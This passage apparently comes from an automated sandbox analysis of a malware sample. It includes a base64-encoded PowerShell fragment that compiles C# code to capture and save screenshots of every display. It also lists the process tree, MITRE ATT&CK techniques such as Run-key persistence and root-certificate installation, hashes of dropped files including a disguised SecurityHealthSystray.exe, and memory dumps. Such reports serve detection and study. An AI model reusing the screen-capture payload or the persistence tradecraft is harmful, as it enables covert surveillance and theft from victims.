ALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3316
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\boktqdpu\boktqdpu.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3444
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEAC.tmp" "c:\Users\Admin\AppData\Local\Temp\boktqdpu\CSCE316142EB02A443CAE8A215C39DF3736.TMP"
      4⤵
      PID:3132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBEAC.tmp

Filesize
1KB

MD5
0738f6a89bd343fc7f29f9c476837268

SHA1
8915ee233e89fe4d1e16d01a5401ab1635c52ee6

SHA256
08fd095c9fb052352b97f8d1316d7169a26b7f31ca20c5fb49dddfae603f7272

SHA512
ba9402463cbf50966ca6a054166463a080e4f5c9d5408c1bca74b0857a4ff32b29fc4bbafc663982d71dc437a46cd3d0ed3055dbf182a0127f94d046251f1eb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tf21zrkm.2wy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aenpRXkT6O\Display (1).png

Filesize
430KB

MD5
4b5c898f0f2e3465a8a2d4af4de4567f

SHA1
77b2bec72621e2a690a12c8d09c9842f7f541b17

SHA256
54efe6d0e3137b5d29eca11031000c1869e5c1cef47605830308da560e49dddd

SHA512
13c153d65bcd65aeeca10dd7c1f1aec32d3242c5f8a37664d169f4dfac42d9eb621e0b4e61323fe0c4e5e50f0346a187f5cc4b073a79de39968a1478f6139f66

Download Submit
C:\Users\Admin\AppData\Local\Temp\boktqdpu\boktqdpu.dll

Filesize
4KB

MD5
7bb3acd97a313c530b03228a0cdfe34d

SHA1
3334ffe3f8fc7e5ed80b86855c1094b8a3eae290

SHA256
346a5f8996d49c0c6425812eabd1767439372fbcab09f7e2bcca859e2facfae3

SHA512
18a01f0abad5f7f4915839e29d176b4257b5fc034965cbcca729a4516a94836b25c7d2f5333d6ac580b049955bf67bd4ff044195d4d2628125a0d87ec3a120b4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.5MB

MD5
cf96d1fe38389340a7bd6f25217b705a

SHA1
ac519311c71a14f076fb48e8dea1744ef4ff747f

SHA256
5ab34085e73ef9e3075544da3ce29acff67f108ab6a710ffcf385351d627d839

SHA512
30ee3f6f37d20fd1bc934902a9efd1b72f2ca9164cdd46658531f1f49d7ace1ecdbe4da8c31316738a56a91500329139942f19eaaf48046934b13470d5fce9d2

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\boktqdpu\CSCE316142EB02A443CAE8A215C39DF3736.TMP

Filesize
652B

MD5
a3dc07ad298bf111785f1ac4264bf629

SHA1
2109b50d9bdb70c925d90bd95dc9aa7cad651bde

SHA256
4f01615e9ac153df43719b2680e48c0a046587c30fdaf7b5a08daae18569166a

SHA512
119ff5f4adb4186b16e3f0803fd23c30249a608c7ab1e5ecd3d9393fd0e08a52a229898a53e1a3ebd212c8252eb264f01668e06af959560717073b65248ec613

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\boktqdpu\boktqdpu.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\boktqdpu\boktqdpu.cmdline

Filesize
607B

MD5
af0964c6cfd6bced6c0701c837cf0a82

SHA1
ab5e32dfdb23e0d06ee0e88338462fbce8a86b86

SHA256
445f7f58f9d2aa2d90ca674dd096b6e952ee65ec0bf1c82377d3911dccf938ad

SHA512
46f1af4abcb8048ea3846f06af828427ca065e03f7f5024a9f4c094f6d9590548769874c115ba92638b4fe4f620331deb02b89fa2b5d5e7d047a5d87ef9057c6

Download Submit
memory/3316-62-0x000002B43F690000-0x000002B43F698000-memory.dmp

Filesize
32KB

Download
memory/3472-35-0x0000020FF37A0000-0x0000020FF39BC000-memory.dmp

Filesize
2.1MB

Download
memory/4484-0-0x00007FFA2D6B3000-0x00007FFA2D6B5000-memory.dmp

Filesize
8KB

Download
memory/4484-20-0x00007FFA2D6B0000-0x00007FFA2E171000-memory.dmp

Filesize
10.8MB

Download
memory/4484-12-0x00007FFA2D6B0000-0x00007FFA2E171000-memory.dmp

Filesize
10.8MB

Download
memory/4484-11-0x00007FFA2D6B0000-0x00007FFA2E171000-memory.dmp

Filesize
10.8MB

Download
memory/4484-6-0x0000022145000000-0x0000022145022000-memory.dmp

Filesize
136KB

Download